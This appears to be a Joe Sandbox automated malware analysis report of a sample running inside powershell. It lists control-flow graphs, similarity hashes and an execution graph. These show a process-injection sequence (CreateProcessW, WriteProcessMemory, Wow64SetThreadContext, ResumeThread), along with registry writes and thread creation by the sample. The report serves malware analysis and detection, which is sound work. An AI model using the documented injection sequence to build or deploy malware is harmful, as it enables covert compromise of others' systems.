                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 9435d70c5a8c7081a8a835e85a027f0fe6271dffeb70298a3a3eb2d520972d5d
                                                                                                        • Instruction ID: b68a28d2cd170c1086ac8bcb3247d6a5d20584d5cb535e2dd2032469acc8336d
                                                                                                        • Opcode Fuzzy Hash: 9435d70c5a8c7081a8a835e85a027f0fe6271dffeb70298a3a3eb2d520972d5d
                                                                                                        • Instruction Fuzzy Hash: 7051387190125ADFEB24CF69C890BDDBBB1BF49304F1485EAD909B7250DB309A99CF60

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 443 2a8368-2a83e1 444 2a83e9-2a83f0 443->444 445 2a83e3-2a83e6 443->445 446 2a83fb-2a8411 444->446 447 2a83f2-2a83f8 444->447 445->444 448 2a841c-2a84bf CreateProcessW 446->448 449 2a8413-2a8419 446->449 447->446 451 2a84c8-2a8540 448->451 452 2a84c1-2a84c7 448->452 449->448 459 2a8552-2a8559 451->459 460 2a8542-2a8548 451->460 452->451 461 2a855b-2a856a 459->461 462 2a8570 459->462 460->459 461->462 464 2a8571 462->464 464->464
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002A84AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: a12af390eb27f40e7c84c0f1430138db400fe7f8ebf48bef1ed17c791da47635
                                                                                                        • Instruction ID: ea9868a74f9a6804f33fdfb41934484f0371ee4d0633b67f8b620665f5649f77
                                                                                                        • Opcode Fuzzy Hash: a12af390eb27f40e7c84c0f1430138db400fe7f8ebf48bef1ed17c791da47635
                                                                                                        • Instruction Fuzzy Hash: 45511571D1121ADFEB24CF99C880BDDBBB5BF48304F1484AAE909B7250DB319A94CF60

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 465 2a871e-2a8766 466 2a8768-2a876e 465->466 467 2a8770-2a87a9 WriteProcessMemory 465->467 466->467 468 2a87ab-2a87b1 467->468 469 2a87b2-2a87d3 467->469 468->469
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002A879C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 6a168feea8d507930e0f5581d67a4d6a8f1b24cc2b7c5d03d572f2e269089fa2
                                                                                                        • Instruction ID: 4d7029f8cf0dc9c2e9208c9b734819e9654e2f43d4960f2d938fa43ce823cff6
                                                                                                        • Opcode Fuzzy Hash: 6a168feea8d507930e0f5581d67a4d6a8f1b24cc2b7c5d03d572f2e269089fa2
                                                                                                        • Instruction Fuzzy Hash: 4D2104B5910249DFDB10CFA9C884BDEFBF4FB48310F10842AE918A7250C3789A54CFA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 471 2a8720-2a8766 472 2a8768-2a876e 471->472 473 2a8770-2a87a9 WriteProcessMemory 471->473 472->473 474 2a87ab-2a87b1 473->474 475 2a87b2-2a87d3 473->475 474->475
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002A879C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 04915778a2e11214e269dafcc1a7c2ce77eb1a7014f861cdb57200e2fd3c3ad9
                                                                                                        • Instruction ID: 0fae9a526762b27254aa7d3cfbe2df56e909b9f12cfdf00aa140731a0698f6c9
                                                                                                        • Opcode Fuzzy Hash: 04915778a2e11214e269dafcc1a7c2ce77eb1a7014f861cdb57200e2fd3c3ad9
                                                                                                        • Instruction Fuzzy Hash: D52104B5910209DFDB10CF9AC884BDEFBF4FB48310F50842AE918A7200D378AA54CFA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 477 2a85a0-2a85e8 478 2a85ea-2a85f2 477->478 479 2a85f4-2a8620 Wow64SetThreadContext 477->479 478->479 480 2a8629-2a864a 479->480 481 2a8622-2a8628 479->481 481->480
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002A8613
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 438e020f21d810e15980d0a58129982856958c924ee292ff8b4daba68329b157
                                                                                                        • Instruction ID: 09c91e6d24e7882d84fce82cfa77ac53efafb30baed19f6c38b706c3919a3961
                                                                                                        • Opcode Fuzzy Hash: 438e020f21d810e15980d0a58129982856958c924ee292ff8b4daba68329b157
                                                                                                        • Instruction Fuzzy Hash: 4A1156B1D102498FDB10CFAAC884BDEFBF4EB89320F14852AD459A3240D7789545CFA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 483 2a85a8-2a85e8 484 2a85ea-2a85f2 483->484 485 2a85f4-2a8620 Wow64SetThreadContext 483->485 484->485 486 2a8629-2a864a 485->486 487 2a8622-2a8628 485->487 487->486
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002A8613
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 647606711c46d63c8ed7d68b9cadd9eca766f8e4ca78dd8cecdbc0052e76424c
                                                                                                        • Instruction ID: a443e73022052bbfe925d12f03d51b4d0a3efb6a526f094e624ed41868bbcdf5
                                                                                                        • Opcode Fuzzy Hash: 647606711c46d63c8ed7d68b9cadd9eca766f8e4ca78dd8cecdbc0052e76424c
                                                                                                        • Instruction Fuzzy Hash: 2E1116B1D102498FDB10CF9AC944BDEFBF4EB89324F15842AD418B3240D778A945CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 489 2a7938-2a7948 call 2a1824 492 2a7888-2a78c6 ResumeThread 489->492 493 2a794e-2a795c 489->493 496 2a78c8-2a78ce 492->496 497 2a78cf-2a78dc 492->497 494 2a732d-2a7330 493->494 495 2a7962-2a7965 493->495 500 2a7c30-2a7c39 494->500 501 2a7336 494->501 495->494 496->497 498 2a7ddb-2a7de2 497->498 499 2a78e2-2a78f3 497->499 499->494 502 2a78f9-2a78fc 499->502 503 2a7ce8-2a7d08 500->503 504 2a7c3f-2a7c52 500->504 501->492 502->494 510 2a7d0a-2a7d0f 503->510 511 2a7d13-2a7d16 503->511 504->494 504->503 510->511 512 2a7d18 511->512 513 2a7d33-2a7d4a 511->513 512->513 514 2a7d78-2a7d7d 512->514 515 2a7d4e-2a7d57 512->515 516 2a7d1f-2a7d2d 512->516 513->511 522 2a7d4c 513->522 523 2a7daf-2a7e30 514->523 519 2a7d59-2a7d63 515->519 520 2a7d7f-2a7da1 515->520 516->511 517 2a7d2f-2a7d31 516->517 517->511 529 2a7d6c call 2a5c24 519->529 530 2a7d65-2a7d6a 519->530 527 2a72b1-2a72b4 520->527 528 2a7da7-2a7daa 520->528 522->511 532 2a72ba 527->532 533 2a7db4-2a7dcd 527->533 528->523 528->527 534 2a7d71-2a7d76 529->534 530->511 532->532 533->527 535 2a7dd3-2a7dd6 533->535 534->514 536 2a7d11 534->536 535->527 536->511
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 9896ff03403cde389a3737ea9973c23d45f04f3a6cbf55eba0fa4dbe25e0d444
                                                                                                        • Instruction ID: 349c547080b07637e55f517edb585b6e57825ede5e7c127c9cbfa0914712b31e
                                                                                                        • Opcode Fuzzy Hash: 9896ff03403cde389a3737ea9973c23d45f04f3a6cbf55eba0fa4dbe25e0d444
                                                                                                        • Instruction Fuzzy Hash: A5116D30938349CFEB20CF54DC48B98B7B2AB52318F2181D5D5086B291CB789DD5DF55

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 537 2a7888-2a78c6 ResumeThread 538 2a78c8-2a78ce 537->538 539 2a78cf-2a78dc 537->539 538->539 540 2a7ddb-2a7de2 539->540 541 2a78e2-2a78f3 539->541 542 2a78f9-2a78fc 541->542 543 2a732d-2a7330 541->543 542->543 545 2a7c30-2a7c39 543->545 546 2a7336 543->546 547 2a7ce8-2a7d08 545->547 548 2a7c3f-2a7c52 545->548 546->537 553 2a7d0a-2a7d0f 547->553 554 2a7d13-2a7d16 547->554 548->543 548->547 553->554 555 2a7d18 554->555 556 2a7d33-2a7d4a 554->556 555->556 557 2a7d78-2a7d7d 555->557 558 2a7d4e-2a7d57 555->558 559 2a7d1f-2a7d2d 555->559 556->554 565 2a7d4c 556->565 566 2a7daf-2a7e30 557->566 562 2a7d59-2a7d63 558->562 563 2a7d7f-2a7da1 558->563 559->554 560 2a7d2f-2a7d31 559->560 560->554 572 2a7d6c call 2a5c24 562->572 573 2a7d65-2a7d6a 562->573 570 2a72b1-2a72b4 563->570 571 2a7da7-2a7daa 563->571 565->554 575 2a72ba 570->575 576 2a7db4-2a7dcd 570->576 571->566 571->570 577 2a7d71-2a7d76 572->577 573->554 575->575 576->570 578 2a7dd3-2a7dd6 576->578 577->557 579 2a7d11 577->579 578->570 579->554
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 5384c40d9b29984e2f5fc63a4c9b9328270062aa4a2d8093d03104ce0402b562
                                                                                                        • Instruction ID: ee915cb78035badde7a0cb3829c9433fd422b9988f7aabe314ca90d5a60b7497
                                                                                                        • Opcode Fuzzy Hash: 5384c40d9b29984e2f5fc63a4c9b9328270062aa4a2d8093d03104ce0402b562
                                                                                                        • Instruction Fuzzy Hash: 0001A430928348CFEB208F54DC4C798B7B1AB52318F2080DAD5086B291CB784ED9DF16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8af84d16695e1f27349c705c6edf70d1274ef924e59d0868b61874b597906085
                                                                                                        • Instruction ID: 2fd03409a46027ea173c51da02480c72fa125504cab689c8396bf0edc4d3e786
                                                                                                        • Opcode Fuzzy Hash: 8af84d16695e1f27349c705c6edf70d1274ef924e59d0868b61874b597906085
                                                                                                        • Instruction Fuzzy Hash: 46418E34A05645CFC722CF58C890966FBF2EF86710B2AC1EAD8498B256D772EC46CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ff548baec559be58db898fe0bddc68c05b3dbfb798cfbd7c8fd074fe76f7e0c4
                                                                                                        • Instruction ID: 0f936d07f75ddbc68dd24a623818f1780d1838af0670dc1049672b9adc6f60f1
                                                                                                        • Opcode Fuzzy Hash: ff548baec559be58db898fe0bddc68c05b3dbfb798cfbd7c8fd074fe76f7e0c4
                                                                                                        • Instruction Fuzzy Hash: AB316C31A04245DFDF36CF59D445BAABBB2BB44304F1AC16AE5149B2A8C370DC91CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473327739.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_1ad000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bcca57d327dabc552aada6a0cf40084784e0a35d0f3adb27d07f3c76555c4884
                                                                                                        • Instruction ID: 692d1b38272d7dee4390e7eefbeb84e9f7496731fd0b934733ea95eb209077f4
                                                                                                        • Opcode Fuzzy Hash: bcca57d327dabc552aada6a0cf40084784e0a35d0f3adb27d07f3c76555c4884
                                                                                                        • Instruction Fuzzy Hash: D6018C6100D3C09FD7124B259D94752BFA8EF53624F1984DBE8858F1A3C3685C45CB72
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473327739.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_1ad000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58e6f17226cb33f80db438cb987056c02c6b290d9c2c5a7575cc8f0e12a5e262
                                                                                                        • Instruction ID: 211a4e67f69d9a4275727555fab67623d8f4dd04a0168fa3394732441339801a
                                                                                                        • Opcode Fuzzy Hash: 58e6f17226cb33f80db438cb987056c02c6b290d9c2c5a7575cc8f0e12a5e262
                                                                                                        • Instruction Fuzzy Hash: 5801F774104740EEE7144A25DDC4767BBD8DF82764F18C415FC4A0F582C3799941CAB1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4cc16d6656d6d73b28adfe05b21e3d7d765e30c1f435087dc340577502fd3c7a
                                                                                                        • Instruction ID: 3496bc3eeba0e6dd891029fdcc08370e047a1cb740bf2c2f9cd3f90f0c681bf3
                                                                                                        • Opcode Fuzzy Hash: 4cc16d6656d6d73b28adfe05b21e3d7d765e30c1f435087dc340577502fd3c7a
                                                                                                        • Instruction Fuzzy Hash: 3AE0D832704754CFDF6E6660D1223AE77516FA2250F11C996C491A765DCA768805C362
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (:3$(:3$(:3$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:3$L:3$L:3
                                                                                                        • API String ID: 0-2656668300
                                                                                                        • Opcode ID: aacf1af9786019d6b193be89d97a9c570055d759d6db68959cb8748fca606abd
                                                                                                        • Instruction ID: 1a53a8a98a52119f293ff0546a0d1073f26104609b025587bee21d79f3bb648b
                                                                                                        • Opcode Fuzzy Hash: aacf1af9786019d6b193be89d97a9c570055d759d6db68959cb8748fca606abd
                                                                                                        • Instruction Fuzzy Hash: F4E15335700204DFDF2A9F64C851B6F7BA6AF81301F25C46AEA059B295DF74CD80CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (Fc$L4#p$L4#p$L4#p$p:3
                                                                                                        • API String ID: 0-2673030979
                                                                                                        • Opcode ID: 971e45049037d6a5d61ee5d7cfbd54e35bc42a5d9382c08c12799b5f66406be4
                                                                                                        • Instruction ID: 277898b32fe9b2dce26739904615e5807a972873d1835dd17daa73e5e308a839
                                                                                                        • Opcode Fuzzy Hash: 971e45049037d6a5d61ee5d7cfbd54e35bc42a5d9382c08c12799b5f66406be4
                                                                                                        • Instruction Fuzzy Hash: E46137357002189FEF1A9E64C851BBFBBA2EFC0310F15C069E9459B295DB70DD91CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L4#p$L4#p$L4#p$L:3$L:3
                                                                                                        • API String ID: 0-3071269406
                                                                                                        • Opcode ID: 43736d7f79ffe6f59edb5c72444e41aad479cfc3a002ae7e7a6f0fac3dbf1660
                                                                                                        • Instruction ID: ef7dac071e3d393239e2a3054fcf6f5acec2f2e154575d81b7eb55d79aaabf47
                                                                                                        • Opcode Fuzzy Hash: 43736d7f79ffe6f59edb5c72444e41aad479cfc3a002ae7e7a6f0fac3dbf1660
                                                                                                        • Instruction Fuzzy Hash: DE41C235600208EFDF2F8E55C542BBB77A6AF40311F2AC065E9059B299DB74DD80CB91

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:4.8%
                                                                                                        Total number of Nodes:1426
                                                                                                        Total number of Limit Nodes:49
                                                                                                        execution_graph 47266 434906 47271 434bd8 SetUnhandledExceptionFilter 47266->47271 47268 43490b pre_c_initialization 47272 4455cc 20 API calls 2 library calls 47268->47272 47270 434916 47271->47268 47272->47270 47273 44839e 47281 448790 47273->47281 47276 4483b2 47278 4483ba 47279 4483c7 47278->47279 47289 4483ca 11 API calls 47278->47289 47290 44854a 47281->47290 47284 4487cf TlsAlloc 47285 4487c0 47284->47285 47297 43502b 47285->47297 47287 4483a8 47287->47276 47288 448319 20 API calls 3 library calls 47287->47288 47288->47278 47289->47276 47291 448576 47290->47291 47292 44857a 47290->47292 47291->47292 47296 44859a 47291->47296 47304 4485e6 47291->47304 47292->47284 47292->47285 47294 4485a6 GetProcAddress 47295 4485b6 __crt_fast_encode_pointer 47294->47295 47295->47292 47296->47292 47296->47294 47298 435036 IsProcessorFeaturePresent 47297->47298 47299 435034 47297->47299 47301 435078 47298->47301 47299->47287 47311 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47301->47311 47303 43515b 47303->47287 47305 448607 LoadLibraryExW 47304->47305 47306 4485fc 47304->47306 47307 448624 GetLastError 47305->47307 47308 44863c 47305->47308 47306->47291 47307->47308 47309 44862f LoadLibraryExW 47307->47309 47308->47306 47310 448653 FreeLibrary 47308->47310 47309->47308 47310->47306 47311->47303 47312 43bea8 47315 43beb4 _swprintf ___FrameUnwindToState 47312->47315 47313 43bec2 47328 44062d 20 API calls _abort 47313->47328 47315->47313 47316 43beec 47315->47316 47323 445909 EnterCriticalSection 47316->47323 47318 43bec7 pre_c_initialization ___FrameUnwindToState 47319 43bef7 47324 43bf98 47319->47324 47323->47319 47326 43bfa6 47324->47326 47325 43bf02 47329 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47325->47329 47326->47325 47330 4497ec 37 API calls 2 library calls 47326->47330 47328->47318 47329->47318 47330->47326 47331 434918 47332 434924 ___FrameUnwindToState 47331->47332 47358 434627 47332->47358 47334 43492b 47336 434954 47334->47336 47664 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47334->47664 47344 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47336->47344 47369 4442d2 47336->47369 47339 434973 ___FrameUnwindToState 47341 4349f3 47377 434ba5 47341->47377 47344->47341 47665 443487 36 API calls 3 library calls 47344->47665 47351 434a15 47352 434a1f 47351->47352 47667 4434bf 28 API calls _abort 47351->47667 47354 434a28 47352->47354 47668 443462 28 API calls _abort 47352->47668 47669 43479e 13 API calls 2 library calls 47354->47669 47357 434a30 47357->47339 47359 434630 47358->47359 47670 434cb6 IsProcessorFeaturePresent 47359->47670 47361 43463c 47671 438fb1 47361->47671 47363 434641 47368 434645 47363->47368 47680 44415f 47363->47680 47366 43465c 47366->47334 47368->47334 47370 4442e9 47369->47370 47371 43502b ___crtLCMapStringA 5 API calls 47370->47371 47372 43496d 47371->47372 47372->47339 47373 444276 47372->47373 47374 4442a5 47373->47374 47375 43502b ___crtLCMapStringA 5 API calls 47374->47375 47376 4442ce 47375->47376 47376->47344 47730 436f10 47377->47730 47380 4349f9 47381 444223 47380->47381 47732 44f0d9 47381->47732 47383 44422c 47384 434a02 47383->47384 47736 446895 36 API calls 47383->47736 47386 40ea00 47384->47386 47907 41cbe1 LoadLibraryA GetProcAddress 47386->47907 47388 40ea1c GetModuleFileNameW 47912 40f3fe 47388->47912 47390 40ea38 47927 4020f6 47390->47927 47393 4020f6 28 API calls 47394 40ea56 47393->47394 47933 41beac 47394->47933 47398 40ea68 47959 401e8d 47398->47959 47400 40ea71 47401 40ea84 47400->47401 47402 40eace 47400->47402 48227 40fbee 118 API calls 47401->48227 47965 401e65 47402->47965 47405 40eade 47409 401e65 22 API calls 47405->47409 47406 40ea96 47407 401e65 22 API calls 47406->47407 47408 40eaa2 47407->47408 48228 410f72 36 API calls __EH_prolog 47408->48228 47410 40eafd 47409->47410 47970 40531e 47410->47970 47413 40eb0c 47975 406383 47413->47975 47414 40eab4 48229 40fb9f 78 API calls 47414->48229 47418 40eabd 48230 40f3eb 71 API calls 47418->48230 47423 401fd8 11 API calls 47425 40ef36 47423->47425 47666 443396 GetModuleHandleW 47425->47666 47426 401fd8 11 API calls 47427 40eb36 47426->47427 47428 401e65 22 API calls 47427->47428 47429 40eb3f 47428->47429 47992 401fc0 47429->47992 47431 40eb4a 47432 401e65 22 API calls 47431->47432 47433 40eb63 47432->47433 47434 401e65 22 API calls 47433->47434 47435 40eb7e 47434->47435 47436 40ebe9 47435->47436 48231 406c59 47435->48231 47438 401e65 22 API calls 47436->47438 47443 40ebf6 47438->47443 47439 40ebab 47440 401fe2 28 API calls 47439->47440 47441 40ebb7 47440->47441 47442 401fd8 11 API calls 47441->47442 47445 40ebc0 47442->47445 47444 40ec3d 47443->47444 47448 413584 3 API calls 47443->47448 47996 40d0a4 47444->47996 48236 413584 RegOpenKeyExA 47445->48236 47447 40ec43 47449 40eac6 47447->47449 47999 41b354 47447->47999 47455 40ec21 47448->47455 47449->47423 47453 40ec5e 47456 40ecb1 47453->47456 48016 407751 47453->48016 47454 40f38a 48317 4139e4 30 API calls 47454->48317 47455->47444 48239 4139e4 30 API calls 47455->48239 47458 401e65 22 API calls 47456->47458 47461 40ecba 47458->47461 47471 40ecc6 47461->47471 47472 40eccb 47461->47472 47463 40f3a0 48318 4124b0 65 API calls ___scrt_get_show_window_mode 47463->48318 47464 40ec87 47469 401e65 22 API calls 47464->47469 47465 40ec7d 48240 407773 30 API calls 47465->48240 47467 40f3aa 47470 41bcef 28 API calls 47467->47470 47480 40ec90 47469->47480 47474 40f3ba 47470->47474 48243 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47471->48243 47477 401e65 22 API calls 47472->47477 47473 40ec82 48241 40729b 98 API calls 47473->48241 48126 413a5e RegOpenKeyExW 47474->48126 47478 40ecd4 47477->47478 48020 41bcef 47478->48020 47480->47456 47484 40ecac 47480->47484 47481 40ecdf 48024 401f13 47481->48024 48242 40729b 98 API calls 47484->48242 47488 401f09 11 API calls 47490 40f3d7 47488->47490 47492 401f09 11 API calls 47490->47492 47494 40f3e0 47492->47494 47493 401e65 22 API calls 47495 40ecfc 47493->47495 48129 40dd7d 47494->48129 47499 401e65 22 API calls 47495->47499 47501 40ed16 47499->47501 47500 40f3ea 47502 401e65 22 API calls 47501->47502 47503 40ed30 47502->47503 47504 401e65 22 API calls 47503->47504 47505 40ed49 47504->47505 47506 40edb6 47505->47506 47507 401e65 22 API calls 47505->47507 47508 40edc5 47506->47508 47514 40ef41 ___scrt_get_show_window_mode 47506->47514 47512 40ed5e _wcslen 47507->47512 47509 40edce 47508->47509 47537 40ee4a ___scrt_get_show_window_mode 47508->47537 47510 401e65 22 API calls 47509->47510 47511 40edd7 47510->47511 47513 401e65 22 API calls 47511->47513 47512->47506 47516 401e65 22 API calls 47512->47516 47515 40ede9 47513->47515 48304 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47514->48304 47519 401e65 22 API calls 47515->47519 47517 40ed79 47516->47517 47520 401e65 22 API calls 47517->47520 47521 40edfb 47519->47521 47522 40ed8e 47520->47522 47525 401e65 22 API calls 47521->47525 48244 40da6f 47522->48244 47523 40ef8c 47524 401e65 22 API calls 47523->47524 47526 40efb1 47524->47526 47528 40ee24 47525->47528 48046 402093 47526->48046 47531 401e65 22 API calls 47528->47531 47530 401f13 28 API calls 47533 40edad 47530->47533 47534 40ee35 47531->47534 47536 401f09 11 API calls 47533->47536 48302 40ce34 45 API calls _wcslen 47534->48302 47535 40efc3 48052 4137aa RegCreateKeyA 47535->48052 47536->47506 48036 413982 47537->48036 47541 40ee45 47541->47537 47543 40eede ctype 47546 401e65 22 API calls 47543->47546 47544 401e65 22 API calls 47545 40efe5 47544->47545 48058 43bb2c 47545->48058 47547 40eef5 47546->47547 47547->47523 47551 40ef09 47547->47551 47550 40effc 48305 41ce2c 87 API calls ___scrt_get_show_window_mode 47550->48305 47553 401e65 22 API calls 47551->47553 47552 40f01f 47557 402093 28 API calls 47552->47557 47555 40ef12 47553->47555 47558 41bcef 28 API calls 47555->47558 47556 40f003 CreateThread 47556->47552 49086 41d4ee 10 API calls 47556->49086 47559 40f034 47557->47559 47560 40ef1e 47558->47560 47561 402093 28 API calls 47559->47561 48303 40f4af 104 API calls 47560->48303 47563 40f043 47561->47563 48062 41b580 47563->48062 47564 40ef23 47564->47523 47566 40ef2a 47564->47566 47566->47449 47568 401e65 22 API calls 47569 40f054 47568->47569 47570 401e65 22 API calls 47569->47570 47571 40f066 47570->47571 47572 401e65 22 API calls 47571->47572 47573 40f086 47572->47573 47574 43bb2c _strftime 40 API calls 47573->47574 47575 40f093 47574->47575 47576 401e65 22 API calls 47575->47576 47577 40f09e 47576->47577 47578 401e65 22 API calls 47577->47578 47579 40f0af 47578->47579 47580 401e65 22 API calls 47579->47580 47581 40f0c4 47580->47581 47582 401e65 22 API calls 47581->47582 47583 40f0d5 47582->47583 47584 40f0dc StrToIntA 47583->47584 48086 409e1f 47584->48086 47587 401e65 22 API calls 47588 40f0f7 47587->47588 47589 40f103 47588->47589 47590 40f13c 47588->47590 48306 43455e 47589->48306 47593 401e65 22 API calls 47590->47593 47595 40f14c 47593->47595 47594 401e65 22 API calls 47596 40f11f 47594->47596 47598 40f194 47595->47598 47599 40f158 47595->47599 47597 40f126 CreateThread 47596->47597 47597->47590 49090 41a045 103 API calls 2 library calls 47597->49090 47601 